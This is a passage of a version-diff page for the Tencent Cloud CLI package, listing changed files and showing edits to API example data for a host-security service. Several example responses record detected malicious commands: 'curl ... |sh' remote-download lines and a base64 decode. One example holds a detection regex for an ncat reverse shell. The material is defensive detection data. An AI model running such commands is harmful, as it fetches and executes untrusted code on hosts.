tccli 3.0.1215.1__py2.py3-none-any.whl → 3.0.1216.1__py2.py3-none-any.whl

Sign up to get free protection for your applications and to get access to all the features.
Files changed (99) hide show
  1. tccli/__init__.py +1 -1
  2. tccli/configure.py +46 -1
  3. tccli/services/__init__.py +0 -3
  4. tccli/services/apm/v20210622/api.json +20 -0
  5. tccli/services/asr/v20190614/api.json +3 -3
  6. tccli/services/bi/v20220105/api.json +32 -4
  7. tccli/services/bi/v20220105/examples.json +1 -1
  8. tccli/services/billing/billing_client.py +53 -0
  9. tccli/services/billing/v20180709/api.json +304 -0
  10. tccli/services/billing/v20180709/examples.json +8 -0
  11. tccli/services/bsca/v20210811/api.json +222 -17
  12. tccli/services/bsca/v20210811/examples.json +4 -4
  13. tccli/services/ccc/ccc_client.py +53 -0
  14. tccli/services/ccc/v20200210/api.json +167 -18
  15. tccli/services/ccc/v20200210/examples.json +11 -3
  16. tccli/services/cdb/v20170320/api.json +13 -4
  17. tccli/services/cdb/v20170320/examples.json +1 -1
  18. tccli/services/cdn/v20180606/api.json +5 -3
  19. tccli/services/cdwdoris/v20211228/api.json +12 -2
  20. tccli/services/cfw/v20190904/api.json +81 -47
  21. tccli/services/cfw/v20190904/examples.json +46 -40
  22. tccli/services/ciam/v20220331/api.json +316 -315
  23. tccli/services/ciam/v20220331/examples.json +49 -49
  24. tccli/services/cloudaudit/cloudaudit_client.py +30 -30
  25. tccli/services/cloudaudit/v20190319/api.json +215 -186
  26. tccli/services/cloudaudit/v20190319/examples.json +13 -13
  27. tccli/services/cls/v20201016/api.json +365 -66
  28. tccli/services/cls/v20201016/examples.json +9 -3
  29. tccli/services/csip/v20221121/api.json +4 -4
  30. tccli/services/cvm/v20170312/api.json +42 -0
  31. tccli/services/cwp/v20180228/api.json +217 -163
  32. tccli/services/cwp/v20180228/examples.json +53 -65
  33. tccli/services/cynosdb/v20190107/api.json +77 -29
  34. tccli/services/cynosdb/v20190107/examples.json +22 -22
  35. tccli/services/dasb/v20191018/api.json +77 -0
  36. tccli/services/dasb/v20191018/examples.json +5 -5
  37. tccli/services/domain/v20180808/api.json +3 -3
  38. tccli/services/domain/v20180808/examples.json +3 -3
  39. tccli/services/eb/v20210416/api.json +15 -15
  40. tccli/services/eb/v20210416/examples.json +1 -1
  41. tccli/services/es/es_client.py +249 -37
  42. tccli/services/es/v20180416/api.json +521 -0
  43. tccli/services/es/v20180416/examples.json +32 -0
  44. tccli/services/ess/ess_client.py +53 -0
  45. tccli/services/ess/v20201111/api.json +145 -9
  46. tccli/services/ess/v20201111/examples.json +15 -1
  47. tccli/services/essbasic/essbasic_client.py +106 -0
  48. tccli/services/essbasic/v20210526/api.json +234 -12
  49. tccli/services/essbasic/v20210526/examples.json +22 -0
  50. tccli/services/gaap/v20180529/api.json +44 -26
  51. tccli/services/gaap/v20180529/examples.json +24 -30
  52. tccli/services/iotexplorer/v20190423/api.json +40 -0
  53. tccli/services/live/v20180801/api.json +35 -9
  54. tccli/services/mongodb/v20190725/api.json +6 -8
  55. tccli/services/ocr/v20181119/api.json +2 -2
  56. tccli/services/organization/organization_client.py +352 -34
  57. tccli/services/organization/v20210331/api.json +451 -0
  58. tccli/services/organization/v20210331/examples.json +48 -0
  59. tccli/services/region/v20220627/api.json +1 -1
  60. tccli/services/scf/scf_client.py +269 -4
  61. tccli/services/scf/v20180416/api.json +554 -0
  62. tccli/services/scf/v20180416/examples.json +46 -0
  63. tccli/services/ssl/v20191205/api.json +1 -1
  64. tccli/services/tat/v20201028/api.json +27 -25
  65. tccli/services/tat/v20201028/examples.json +4 -4
  66. tccli/services/tcss/v20201101/api.json +13 -13
  67. tccli/services/tcss/v20201101/examples.json +5 -5
  68. tccli/services/tdmq/v20200217/api.json +64 -63
  69. tccli/services/tdmq/v20200217/examples.json +2 -2
  70. tccli/services/tem/v20210701/api.json +144 -103
  71. tccli/services/tem/v20210701/examples.json +27 -27
  72. tccli/services/teo/teo_client.py +277 -12
  73. tccli/services/teo/v20220901/api.json +1020 -143
  74. tccli/services/teo/v20220901/examples.json +71 -1
  75. tccli/services/tke/tke_client.py +53 -0
  76. tccli/services/tke/v20180525/api.json +43 -0
  77. tccli/services/tke/v20180525/examples.json +8 -0
  78. tccli/services/tms/tms_client.py +4 -57
  79. tccli/services/tms/v20201229/api.json +0 -354
  80. tccli/services/tms/v20201229/examples.json +0 -8
  81. tccli/services/trtc/v20190722/api.json +221 -22
  82. tccli/services/vpc/v20170312/api.json +105 -30
  83. tccli/services/vpc/v20170312/examples.json +10 -2
  84. tccli/services/vpc/vpc_client.py +107 -54
  85. tccli/services/waf/v20180125/api.json +61 -0
  86. tccli/services/waf/v20180125/examples.json +8 -0
  87. tccli/services/waf/waf_client.py +53 -0
  88. tccli/services/wedata/v20210820/api.json +686 -0
  89. tccli/services/wedata/v20210820/examples.json +16 -0
  90. tccli/services/wedata/wedata_client.py +106 -0
  91. {tccli-3.0.1215.1.dist-info → tccli-3.0.1216.1.dist-info}/METADATA +6 -2
  92. {tccli-3.0.1215.1.dist-info → tccli-3.0.1216.1.dist-info}/RECORD +95 -99
  93. tccli/services/cr/__init__.py +0 -4
  94. tccli/services/cr/cr_client.py +0 -1626
  95. tccli/services/cr/v20180321/api.json +0 -2829
  96. tccli/services/cr/v20180321/examples.json +0 -235
  97. {tccli-3.0.1215.1.dist-info → tccli-3.0.1216.1.dist-info}/WHEEL +0 -0
  98. {tccli-3.0.1215.1.dist-info → tccli-3.0.1216.1.dist-info}/entry_points.txt +0 -0
  99. {tccli-3.0.1215.1.dist-info → tccli-3.0.1216.1.dist-info}/license_files/LICENSE +0 -0
tccli/services/cwp/v20180228/examples.json CHANGED
@@ -3,8 +3,8 @@
3
3
  "AddLoginWhiteLists": [
4
4
  {
5
5
  "document": "入侵检测-登录审计-批量添加异地登录白名单",
6
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: AddLoginWhiteLists\n<公共请求参数>\n\n{\n \"EventId\": 11234,\n \"ProcessType\": \"Id\",\n \"HostLoginWhiteObj\": {\n \"UserName\": \"xx\",\n \"Remark\": \"xx\",\n \"Places\": [\n {\n \"CityId\": 0,\n \"CountryId\": 0,\n \"ProvinceId\": 135\n }\n ],\n \"IsGlobal\": 0,\n \"HostInfos\": [\n {\n \"Quuid\": \"66640e61-aaaa-4632-aaaa-aaaa037e7ba0\",\n \"Uuid\": \"66640e61-aaaa-4632-aaaa-aaaa037e7ba0\"\n }\n ],\n \"StartTime\": \"00:00\",\n \"SrcIp\": \"1.2.3.4\",\n \"EndTime\": \"00:01\"\n }\n}",
7
- "output": "{\n \"Response\": {\n \"RequestId\": \"4234234\",\n \"Error\": {\n \"Code\": \"InvalidParameter.RuleHostipErr\",\n \"Message\": \"无对应主机信息\"\n }\n }\n}",
6
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: AddLoginWhiteLists\n<公共请求参数>\n\n{\n \"EventId\": 11234,\n \"ProcessType\": \"Id\",\n \"HostLoginWhiteObj\": {\n \"UserName\": \"root\",\n \"Remark\": \"备注\",\n \"Places\": [\n {\n \"CityId\": 0,\n \"CountryId\": 0,\n \"ProvinceId\": 135\n }\n ],\n \"IsGlobal\": 0,\n \"HostInfos\": [\n {\n \"Quuid\": \"66640e61-aaaa-4632-aaaa-aaaa037e7ba0\",\n \"Uuid\": \"66640e61-aaaa-4632-aaaa-aaaa037e7ba0\"\n }\n ],\n \"StartTime\": \"00:00\",\n \"SrcIp\": \"1.2.3.4\",\n \"EndTime\": \"00:01\"\n }\n}",
7
+ "output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"Error\": {\n \"Code\": \"InvalidParameter.RuleHostipErr\",\n \"Message\": \"无对应主机信息\"\n }\n }\n}",
8
8
  "title": "批量添加异地登录白名单"
9
9
  }
10
10
  ],
@@ -89,8 +89,8 @@
89
89
  "CreateBanWhiteList": [
90
90
  {
91
91
  "document": "",
92
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateBanWhiteList\n<公共请求参数>\n\n{\n \"Rules\": {\n \"Remark\": \"xx\",\n \"Uuid\": \"xx\",\n \"IsGlobal\": true,\n \"Id\": \"xx\",\n \"ModifyTime\": \"2020-09-22 00:00:00\",\n \"SrcIp\": \"xx\",\n \"CreateTime\": \"2020-09-22 00:00:00\",\n \"Quuids\": [\n \"xx\"\n ]\n }\n}",
93
- "output": "{\n \"Response\": {\n \"IsDuplicate\": true,\n \"IsGlobal\": false,\n \"DuplicateHosts\": [\n {\n \"Quuid\": \"xx\",\n \"Uuid\": \"xx\",\n \"Id\": 1\n },\n {\n \"Id\": 1,\n \"Quuid\": \"xx\",\n \"Uuid\": \"xx\"\n },\n {\n \"Id\": 1,\n \"Quuid\": \"xx\",\n \"Uuid\": \"xx\"\n },\n {\n \"Id\": 1,\n \"Quuid\": \"xx\",\n \"Uuid\": \"xx\"\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
92
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateBanWhiteList\n<公共请求参数>\n\n{\n \"Rules\": {\n \"Remark\": \"备注\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"IsGlobal\": true,\n \"Id\": \"1\",\n \"ModifyTime\": \"2020-09-22 00:00:00\",\n \"SrcIp\": \"1.1.1.1\",\n \"CreateTime\": \"2020-09-22 00:00:00\",\n \"Quuids\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ]\n }\n}",
93
+ "output": "{\n \"Response\": {\n \"IsDuplicate\": true,\n \"IsGlobal\": false,\n \"DuplicateHosts\": [\n {\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Id\": 1\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
94
94
  "title": "添加阻断白名单列表"
95
95
  }
96
96
  ],
@@ -162,7 +162,7 @@
162
162
  {
163
163
  "document": "",
164
164
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateMalwareWhiteList\n<公共请求参数>\n\n{\n \"QuuidList\": [\n \"abc\"\n ],\n \"IsGlobal\": 1,\n \"Mode\": 1,\n \"MatchType\": 1,\n \"FileName\": [\n \"abc\"\n ],\n \"FileDirectory\": [\n \"abc\"\n ],\n \"FileExtension\": [\n \"abc\"\n ],\n \"Md5List\": [\n \"e10adc3949ba59abbe56e057f20f883e\"\n ],\n \"EventId\": 1\n}",
165
- "output": "{\n \"Response\": {\n \"RequestId\": \"abc\"\n }\n}",
165
+ "output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
166
166
  "title": "创建木马白名单"
167
167
  }
168
168
  ],
@@ -217,7 +217,7 @@
217
217
  "CreateVulFix": [
218
218
  {
219
219
  "document": "提交漏洞修护",
220
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateVulFix\n<公共请求参数>\n\n{\n \"CreateVulFixTaskQuuids\": [\n {\n \"Quuids\": [\n \"xx\"\n ],\n \"VulId\": 1\n }\n ],\n \"SnapshotName\": \"xx\",\n \"SaveDays\": 1\n}",
220
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateVulFix\n<公共请求参数>\n\n{\n \"CreateVulFixTaskQuuids\": [\n {\n \"Quuids\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ],\n \"VulId\": 1\n }\n ],\n \"SnapshotName\": \"快照名称\",\n \"SaveDays\": 1\n}",
221
221
  "output": "{\n \"Response\": {\n \"RequestId\": \"f14ce73f-50d7-4c36-af1d-fc33dae510c4\",\n \"FixId\": 1\n }\n}",
222
222
  "title": "提交漏洞修护"
223
223
  }
@@ -1050,7 +1050,7 @@
1050
1050
  {
1051
1051
  "document": "",
1052
1052
  "input": "https://cwp.tencentcloudapi.com/?Action=DescribeBanRegions\n&Mode=STANDARD_MODE\n&<公共请求参数>",
1053
- "output": "{\n \"Response\": {\n \"RegionSet\": [\n {\n \"ZoneSet\": [\n {\n \"ZoneName\": \"xx\"\n }\n ],\n \"RegionName\": \"xx\"\n },\n {\n \"ZoneSet\": [\n {\n \"ZoneName\": \"xx\"\n }\n ],\n \"RegionName\": \"xx\"\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
1053
+ "output": "{\n \"Response\": {\n \"RegionSet\": [\n {\n \"RegionName\": \"华南地区(广州)\",\n \"ZoneSet\": [\n {\n \"ZoneName\": \"广州二区\"\n },\n {\n \"ZoneName\": \"广州三区\"\n },\n {\n \"ZoneName\": \"广州四区\"\n },\n {\n \"ZoneName\": \"广州六区\"\n },\n {\n \"ZoneName\": \"广州七区\"\n }\n ]\n }\n ],\n \"RequestId\": \"dd2d8482-b462-4260-a9df-2f9e92abd72b\"\n }\n}",
1054
1054
  "title": "获取阻断地域"
1055
1055
  }
1056
1056
  ],
@@ -1317,16 +1317,10 @@
1317
1317
  }
1318
1318
  ],
1319
1319
  "DescribeBashEvents": [
1320
- {
1321
- "document": "获取高危命令列表",
1322
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashEvents\n<公共请求参数>\n\n{}",
1323
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Status\": 1,\n \"RuleLevel\": 1,\n \"Exe\": \"xx\",\n \"Uuid\": \"xx\",\n \"RuleId\": 1,\n \"RegexBashCmd\": \"xx\",\n \"DetectBy\": 1,\n \"RuleName\": \"xx\",\n \"Pid\": \"xx\",\n \"MachineName\": \"xx\",\n \"Id\": 1,\n \"Platform\": 1,\n \"User\": \"xx\",\n \"Hostip\": \"xx\",\n \"ModifyTime\": \"xx\",\n \"CreateTime\": \"xx\",\n \"BashCmd\": \"xx\",\n \"RuleCategory\": 1,\n \"Quuid\": \"xx\"\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
1324
- "title": "获取高危命令列表"
1325
- },
1326
1320
  {
1327
1321
  "document": "",
1328
1322
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashEvents\n<公共请求参数>\n\n{\n \"Limit\": \"1\",\n \"Offset\": \"0\"\n}",
1329
- "output": "{\n \"Response\": {\n \"List\": [\n {\n \"Uuid\": \"02db9a21-78fe-4a4c-b96f-a11bf819a962\",\n \"Id\": 3148114,\n \"Quuid\": \"02db9a21-78fe-4a4c-b96f-a11bf819a962\",\n \"Hostip\": \"192.168.111.28\",\n \"User\": \"root\",\n \"Platform\": 4,\n \"BashCmd\": \"./r3hook_tool moc -var www.test123.com\",\n \"RuleId\": 0,\n \"RuleName\": \"sysrule_custom_procmon_1\",\n \"RuleLevel\": 1,\n \"Status\": 0,\n \"CreateTime\": \"2022-09-01 17:28:39\",\n \"MachineName\": \"v_llzlu恶意请求\",\n \"DetectBy\": 0,\n \"Pid\": \"0\",\n \"Exe\": \"\",\n \"ModifyTime\": \"0001-01-01 00:00:00\",\n \"RegexBashCmd\": \"\\\\./r3hook_tool moc -var www\\\\.test123\\\\.com\",\n \"RuleCategory\": 0\n }\n ],\n \"RequestId\": \"c787b780-0a35-4fa5-aca3-db339b9a20e8\",\n \"TotalCount\": 51315\n }\n}",
1323
+ "output": "{\n \"Response\": {\n \"List\": [\n {\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Id\": 10001,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Hostip\": \"1.1.1.1\",\n \"User\": \"root:root\",\n \"Platform\": 4,\n \"BashCmd\": \"/bin/sh -c curl www.xx.com |sh\",\n \"RuleId\": 150,\n \"RuleName\": \"系统规则(标准)-计划任务远程下载\",\n \"RuleLevel\": 2,\n \"Status\": 0,\n \"CreateTime\": \"2024-10-17 12:16:08\",\n \"MachineName\": \"机器名称\",\n \"DetectBy\": 1,\n \"Pid\": \"27605\",\n \"Exe\": \"/usr/bin/bash\",\n \"ModifyTime\": \"2024-10-17 20:09:01\",\n \"RegexBashCmd\": \"/bin/sh -c curl www.xx.com |sh\",\n \"RuleCategory\": 0,\n \"HostName\": \"机器名称\"\n }\n ],\n \"RequestId\": \"7ae8b771-d517-4f78-95e0-a5432a5f1b49\",\n \"TotalCount\": 1\n }\n}",
1330
1324
  "title": "高危命令事件列表"
1331
1325
  }
1332
1326
  ],
@@ -1334,7 +1328,7 @@
1334
1328
  {
1335
1329
  "document": "",
1336
1330
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashEventsInfo\n<公共请求参数>\n\n{\n \"Id\": 12\n}",
1337
- "output": "{\n \"Response\": {\n \"BashEventsInfo\": {\n \"Uuid\": \"xx\",\n \"RegexBashCmd\": \"xx\",\n \"Platform\": 1,\n \"Id\": 1,\n \"Status\": 1,\n \"MachineWanIp\": \"xx\",\n \"Tags\": [\n \"xx\"\n ],\n \"MachineName\": \"xx\",\n \"RuleLevel\": 1,\n \"SuggestScheme\": \"xx\",\n \"Exe\": \"xx\",\n \"HostIp\": \"xx\",\n \"ModifyTime\": \"xx\",\n \"BashCmd\": \"xx\",\n \"RuleCategory\": 1,\n \"RuleId\": 1,\n \"HarmDescribe\": \"xx\",\n \"References\": [\n \"xx\"\n ],\n \"Quuid\": \"xx\",\n \"RuleName\": \"xx\",\n \"MachineStatus\": \"xx\",\n \"CreateTime\": \"xx\",\n \"PsTree\": \"xx\"\n },\n \"RequestId\": \"f14ce73f-50d7-4c36-af1d-fc33dae510c4\"\n }\n}",
1331
+ "output": "{\n \"Response\": {\n \"BashEventsInfo\": {\n \"BashCmd\": \"base64 -d\",\n \"CreateTime\": \"2024-10-24 16:20:57\",\n \"DetectBy\": \"1\",\n \"Exe\": \"/usr/bin/base64\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会执行恶意文件下载、连接矿池、添加公钥、查看敏感文件等操作。\",\n \"HostIp\": \"1.1.1.1\",\n \"Id\": 10001,\n \"MachineName\": \"机器名称\",\n \"MachineStatus\": \"ONLINE\",\n \"MachineWanIp\": \"1.1.1.1\",\n \"ModifyTime\": \"2024-10-24 16:20:58\",\n \"Pid\": \"5747\",\n \"Platform\": 4,\n \"PsTree\": \"[{\\\"pid\\\":5747,\\\"exe\\\":\\\"/usr/bin/base64\\\",\\\"account\\\":\\\"root:root\\\",\\\"cmdline\\\":\\\"base64 -d\\\",\\\"ssh_service\\\":\\\"1.1.1.1\\\",\\\"ssh_source\\\":\\\"1.1.1.1:2578\\\",\\\"start_time\\\":1729758057,\\\"type\\\":1},{\\\"pid\\\":4461,\\\"exe\\\":\\\"/usr/bin/bash\\\",\\\"account\\\":\\\"root:root\\\",\\\"cmdline\\\":\\\"-bash\\\",\\\"ssh_service\\\":\\\"1.1.1.1:22\\\",\\\"ssh_source\\\":\\\"1.1.1.1:2578\\\",\\\"start_time\\\":1729757844,\\\"type\\\":2}]\",\n \"Quuid\": \"fcf85fc9-f45e-457a-bca4-fcae074eda32\",\n \"References\": [],\n \"RegexBashCmd\": \"base64 -d\",\n \"RuleCategory\": 1,\n \"RuleId\": 0,\n \"RuleLevel\": 1,\n \"RuleName\": \"sh拦截\",\n \"Status\": 5,\n \"SuggestScheme\": \"1、检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2、隔离或者删除相关的木马文件;\\n3、对系统进行风险排查,并进行安全加固,详情可参考如下链接:xa0\\n【Linux】https://cloud.tencent.com/document/product/296/9604xa0\\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"Tags\": [],\n \"User\": \"0:0\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n },\n \"RequestId\": \"41030e32-67ec-4f07-858c-432ea384ad5a\"\n }\n}",
1338
1332
  "title": "示例"
1339
1333
  }
1340
1334
  ],
@@ -1342,14 +1336,8 @@
1342
1336
  {
1343
1337
  "document": "",
1344
1338
  "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashEventsInfoNew\n<公共请求参数>\n\n{\n \"Id\": 12\n}",
1345
- "output": "{\n \"Response\": {\n \"BashEventsInfo\": {\n \"Uuid\": \"xx\",\n \"RegexBashCmd\": \"xx\",\n \"Platform\": 1,\n \"Id\": 1,\n \"Status\": 1,\n \"MachineWanIp\": \"xx\",\n \"Tags\": [\n \"xx\"\n ],\n \"MachineName\": \"xx\",\n \"RuleLevel\": 1,\n \"SuggestScheme\": \"xx\",\n \"Exe\": \"xx\",\n \"HostIp\": \"xx\",\n \"ModifyTime\": \"xx\",\n \"BashCmd\": \"xx\",\n \"RuleCategory\": 1,\n \"RuleId\": 1,\n \"HarmDescribe\": \"xx\",\n \"References\": [\n \"xx\"\n ],\n \"Quuid\": \"xx\",\n \"RuleName\": \"xx\",\n \"MachineStatus\": \"xx\",\n \"CreateTime\": \"xx\",\n \"PsTree\": \"xx\"\n },\n \"RequestId\": \"f14ce73f-50d7-4c36-af1d-fc33dae510c4\"\n }\n}",
1346
- "title": "示例"
1347
- },
1348
- {
1349
- "document": "",
1350
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashEventsInfoNew\n<公共请求参数>\n\n{\n \"Id\": \"3170751\"\n}",
1351
- "output": "{\n \"Response\": {\n \"BashEventsInfo\": {\n \"Uuid\": \"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\n \"Id\": 3170751,\n \"Quuid\": \"d8feb20e-dcdd-461b-9b37-336c42d48657\",\n \"HostIp\": \"172.16.0.49\",\n \"Platform\": 4,\n \"BashCmd\": \"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\n \"RuleId\": 0,\n \"RuleName\": \"1003.恶意命令-下载&执行未知程序\",\n \"RuleLevel\": 1,\n \"Status\": 0,\n \"CreateTime\": \"2022-09-19 19:45:05\",\n \"Exe\": \"/usr/bin/bash\",\n \"ModifyTime\": \"2022-09-19 19:45:05\",\n \"PsTree\": \"W3sicGlkIjoyOTQ0NiwiZXhlIjoiL3Vzci9iaW4vYmFzaCIsImFjY291bnQiOiJyb290OnJvb3QiLCJjbWRsaW5lIjoiL2Jpbi9zaCAtYyBjdXJsIDQzLjEyOS42NS4xMDEvMS5zaHxzaCJ9LHsicGlkIjoyOTQ0NCwiZXhlIjoiL3Vzci9zYmluL2Nyb25kIiwiYWNjb3VudCI6InJvb3Q6cm9vdCIsImNtZGxpbmUiOiIvdXNyL3NiaW4vQ1JPTkQgLW4ifSx7InBpZCI6MTM5OSwiZXhlIjoiL3Vzci9zYmluL2Nyb25kIiwiYWNjb3VudCI6InJvb3Q6cm9vdCIsImNtZGxpbmUiOiIvdXNyL3NiaW4vY3JvbmQgLW4ifV0=\",\n \"User\": \"0:0\",\n \"Pid\": \"29446\",\n \"RegexBashCmd\": \"/bin/sh -c curl 43\\\\.129\\\\.65\\\\.101/1\\\\.sh\\\\|sh\",\n \"RuleCategory\": 0,\n \"MachineName\": \"功能测试软件较多_ivon\",\n \"SuggestScheme\": \"1.检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2.隔离或者删除相关的木马文件;\\n3.对系统进行风险排查,并进行安全加固,详情可参考如下链接: \\n【Linux】https://cloud.tencent.com/document/product/296/9604 \\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会执行恶意文件下载、连接矿池、添加公钥、查看敏感文件等操作。\",\n \"Tags\": [],\n \"References\": [],\n \"MachineWanIp\": \"42.194.146.17\",\n \"MachineStatus\": \"ONLINE\",\n \"MachineType\": 2,\n \"DetectBy\": 1\n },\n \"RequestId\": \"0a9b5442-cd56-4b47-86c7-0f9f22d9fc7e\"\n }\n}",
1352
- "title": "示例1"
1339
+ "output": "{\n \"Response\": {\n \"BashEventsInfo\": {\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Id\": 10001,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"HostIp\": \"1.1.1.1\",\n \"Platform\": 4,\n \"BashCmd\": \"base64 -d\",\n \"RuleId\": 31390,\n \"RuleName\": \"sh拦截\",\n \"RuleLevel\": 1,\n \"Status\": 5,\n \"CreateTime\": \"2024-10-24 16:20:58\",\n \"Exe\": \"/usr/bin/base64\",\n \"ModifyTime\": \"2024-10-24 16:20:58\",\n \"PsTree\": \"\",\n \"User\": \"0:0\",\n \"Pid\": \"5747\",\n \"RegexBashCmd\": \"base64 -d\",\n \"RuleCategory\": 1,\n \"MachineName\": \"机器名称\",\n \"SuggestScheme\": \"1.检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n2.隔离或者删除相关的木马文件;\\n3.对系统进行风险排查,并进行安全加固,详情可参考如下链接:xa0\\n【Linux】https://cloud.tencent.com/document/product/296/9604xa0\\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会执行恶意文件下载、连接矿池、添加公钥、查看敏感文件等操作。\",\n \"Tags\": [],\n \"References\": [],\n \"MachineWanIp\": \"1.1.1.1\",\n \"MachineStatus\": \"ONLINE\",\n \"MachineType\": 2,\n \"DetectBy\": 1\n },\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
1340
+ "title": "查询高危命令详情信息"
1353
1341
  }
1354
1342
  ],
1355
1343
  "DescribeBashEventsNew": [
@@ -1370,17 +1358,17 @@
1370
1358
  ],
1371
1359
  "DescribeBashRules": [
1372
1360
  {
1373
- "document": "",
1374
- "input": "https://cwp.tencentcloudapi.com/?Action=DescribeBashRules\n&Type=1\n&<公共请求参数>",
1375
- "output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Status\": 1,\n \"Name\": \"xx\",\n \"Level\": 1,\n \"Hostip\": \"xx\",\n \"IsGlobal\": 1,\n \"Rule\": \"xx\",\n \"CreateTime\": \"xx\",\n \"Decription\": \"xx\",\n \"Uuids\": [\n \"xx\"\n ],\n \"ModifyTime\": \"xx\",\n \"Operator\": \"xx\",\n \"White\": 1,\n \"DealOldEvents\": 1,\n \"Id\": 1,\n \"Uuid\": \"xx\"\n }\n ],\n \"RequestId\": \"xx\"\n }\n}",
1376
- "title": "获取高危命令规则列表"
1361
+ "document": "获取高危命令规则列表",
1362
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBashRules\n<公共请求参数>\n\n{\n \"Type\": 1\n}",
1363
+ "output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 1,\n \"Uuid\": \"\",\n \"Name\": \"反弹shell\",\n \"Level\": 3,\n \"Rule\": \"ncat\\\\s+--ssl.*?\\\\/bin\\\\/bash\",\n \"Decription\": \"\",\n \"Operator\": \"root\",\n \"IsGlobal\": 0,\n \"Status\": 0,\n \"CreateTime\": \"2021-04-10 16:46:55\",\n \"ModifyTime\": \"2021-04-10 16:46:55\",\n \"Hostip\": \"\",\n \"White\": 0,\n \"Uuids\": [],\n \"DealOldEvents\": 0,\n \"Description\": \"\"\n }\n ],\n \"RequestId\": \"a0e9ed25-686e-452b-8dd1-ef25440c6543\",\n \"TotalCount\": 1\n }\n}",
1364
+ "title": "示例"
1377
1365
  }
1378
1366
  ],
1379
1367
  "DescribeBruteAttackList": [
1380
1368
  {
1381
1369
  "document": "获取密码破解列表",
1382
- "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBruteAttackList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Filters\": [\n {\n \"Values\": [\n \"abc\"\n ],\n \"Name\": \"abc\",\n \"ExactMatch\": true\n }\n ],\n \"Offset\": 1\n}",
1383
- "output": "{\n \"Response\": {\n \"BruteAttackList\": [\n {\n \"Id\": 202008000000971,\n \"Uuid\": \"c2972dd6-165e-11ea-95eb-40f2e9f5667a\",\n \"MachineIp\": \"10.104.135.28\",\n \"MachineName\": \"poc测试-debian9\",\n \"UserName\": \"root\",\n \"SrcIp\": \"117.146.173.98\",\n \"Status\": \"FAILED\",\n \"EventType\": 200,\n \"Country\": 1,\n \"City\": 334,\n \"Province\": 31,\n \"CreateTime\": \"2020-02-21 16:35:49\",\n \"BanStatus\": 82,\n \"Count\": 1098,\n \"InstanceId\": \"ins-xxx\"\n }\n ],\n \"RequestId\": \"4234234\",\n \"TotalCount\": 25328\n }\n}",
1370
+ "input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBruteAttackList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Offset\": 1\n}",
1371
